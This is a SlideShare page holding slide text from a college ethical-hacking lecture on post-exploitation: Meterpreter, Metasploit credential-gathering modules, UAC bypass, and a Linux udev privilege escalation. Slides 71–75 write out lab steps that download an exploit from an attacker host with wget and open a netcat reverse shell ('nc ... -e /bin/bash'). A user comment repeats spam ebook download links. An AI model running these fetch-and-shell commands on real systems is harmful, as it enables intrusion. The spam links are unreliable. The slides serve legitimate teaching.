Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

CNIT 124 Ch 13: Post Exploitation (Part 1)

445 views

Published on

Slides for a college course in "Advanced Ethical Hacking" at CCSF. Instructor: Sam Bowne

Course Web page:

https://samsclass.info/124/124_F17.shtml

Based on "Penetration Testing: A Hands-On Introduction to Hacking" by Georgia Weidman -- ISBN-10: 1593275641, No Starch Press; 1 edition (June 8, 2014)

Published in: Education
  • DOWNLOAD FULL BOOKS, INTO AVAILABLE FORMAT ......................................................................................................................... ......................................................................................................................... 1.DOWNLOAD FULL. PDF EBOOK here { https://tinyurl.com/yxufevpm } ......................................................................................................................... 1.DOWNLOAD FULL. EPUB Ebook here { https://tinyurl.com/yxufevpm } ......................................................................................................................... 1.DOWNLOAD FULL. doc Ebook here { https://tinyurl.com/yxufevpm } ......................................................................................................................... 1.DOWNLOAD FULL. PDF EBOOK here { https://tinyurl.com/yxufevpm } ......................................................................................................................... 1.DOWNLOAD FULL. EPUB Ebook here { https://tinyurl.com/yxufevpm } ......................................................................................................................... 1.DOWNLOAD FULL. doc Ebook here { https://tinyurl.com/yxufevpm } ......................................................................................................................... ......................................................................................................................... ......................................................................................................................... .............. Browse by Genre Available eBooks ......................................................................................................................... Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult,
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Be the first to like this

CNIT 124 Ch 13: Post Exploitation (Part 1)

  1. 1. CNIT 124: Advanced Ethical Hacking Ch 13: Post Exploitation Part 1 Rev. 11-8-17
  2. 2. Topics in This Lecture • Meterpreter • Meterpreter Scripts • Metasploit Post-Exploitation Modules • Railgun • Local Privilege Escalation
  3. 3. Topics in the Next Lecture • Local Information Gathering • Lateral Movement • Pivoting • Persistence
  4. 4. Meterpreter
  5. 5. Help • help at meterpreter prompt – Shows all meterpreter commands • command –h – Help about a specific command • help command – Help about a specific command
  6. 6. Controlling Metasploit Sessions • sessions – lists sessions • sessions -i 1 – Starts interaction with session 1 • background – preserves a session, returns to the msf> prompt • exit – closes a Meterpreter session
  7. 7. Upload • Must use two backslashes to symbolize one – "Escaping" in Linux
  8. 8. Windows Binaries in Kali 2
  9. 9. Project 15: RAM Scraping
  10. 10. Meterpreter Scripts
  11. 11. Meterpreter Scripts
  12. 12. Deprecated
  13. 13. AutoRunScript
  14. 14. Getting Help • run script -h • ps lists running processes on target • Useful to choose a migration target • run migrate -p 1144
  15. 15. Prefetch • Prefetch shows last 128 programs used • Useful for forensics
  16. 16. process_memdump
  17. 17. persistence
  18. 18. virusscan_bypass
  19. 19. Other Interesting Scripts • arp_scanner -- fast host discovery • killav -- no information in help
  20. 20. Metasploit Post-Exploitation Modules
  21. 21. Directory Structure
  22. 22. post/windows/gather
  23. 23. bitcoin_jacker
  24. 24. netlm_downgrade
  25. 25. enum_logged_on_users
  26. 26. enum_logged_on_users
  27. 27. Gathering Credentials
  28. 28. Autologon Password
  29. 29. Not On By Default
  30. 30. sso (MimiKatz)
  31. 31. On By Default ☺
  32. 32. Gather Modules
  33. 33. More Gather Modules
  34. 34. CheckVM
  35. 35. It Works!
  36. 36. BitLocker Recovery Passwords
  37. 37. LSA Secrets!
  38. 38. Works on Server 2008!
  39. 39. memory_grep
  40. 40. Looks Good But Fails
  41. 41. • An alternative to using MimiKatz • Metasploit SMB Listener (Link Ch 13b)
  42. 42. Phishing
  43. 43. Fails on Win 7 and 2008 • Won't run at all on Win 2008 • On Win 7, this box pops up all the time but the password never appears in Metasploit • Must restart Windows to make it stop
  44. 44. enum_ie
  45. 45. Fails • Gets no passwords or cookies from Win 7 or Win 2008 • Does get some Web history links from IE 7 on Win 2008
  46. 46. Management Modules
  47. 47. inject_ca • Subverts HTTPS ☺
  48. 48. MS SQL Auth Bypass
  49. 49. Forensic Image of Target • Harvest deleted files
  50. 50. Exploit PXE 
 Pre-eXecution Boot
  51. 51. Remote Packet Capture
  52. 52. Look in Shadow Copies
 (Restore Points)
  53. 53. Find Open Outgoing Ports
  54. 54. Find Wireless Networks
  55. 55. Steal WPA Keys
  56. 56. Railgun
  57. 57. Allows Direct Access to Windows APIs • API: Application Program Interface • irb drops into a Ruby shell • client.railgun.shell32.IsUserAnAdmin • Tells Ruby interpreter to use railgun to access the IsUserAdmin function of shell32.dll
  58. 58. Allows Direct Access to Windows APIs
  59. 59. reverse_lookup uses Railgun
  60. 60. Local Privilege Escalation
  61. 61. getsystem • Tries to elevate to SYSTEM on Windows • rev2self undoes this escalation
  62. 62. User Account Control (UAC) • Pops up when something needs administrator privileges
  63. 63. UAC Blocks getsystem • On Win 7
  64. 64. Bypassing UAC
  65. 65. Process Injection
  66. 66. Worked on Win 7!
  67. 67. Udev Privilege Escalation on Linux • uname -a to find kernel version • lsb_release -a to find Ubuntu version • udevadm --version
  68. 68. Searching the Exploitdb Repository • searchsploit
  69. 69. Recent Ubuntu Exploits
  70. 70. 8572.c
  71. 71. Exploit Process • On Kali • ln -s /usr/share/exploitdb/platforms/ linux/local/ /var/www/html/ • On Metasploitable 2 • cd /tmp • wget http://172.16.1.188/local/ 8572.c • gcc -o 8572 8572.c
  72. 72. Exploit Process • On Kali • nano /var/www/html/run • #!/bin/bash • nc 172.16.1.188 12345 -e /bin/ bash • nc -lvp 12345
  73. 73. Exploit Process • On Metasploitable 2 • cd /tmp • wget http://172.16.1.188/run
  74. 74. Exploit Process • On Metasploitable 2 • cat /proc/net/netlink • ps aux | grep udev • ./8572 2738
  75. 75. Exploit Process • gcc must be installed on target Linux system • Put 8572.c in /var/www/html on Kali • Download it to target system with wget • Compile there and run
  76. 76. Escalation

×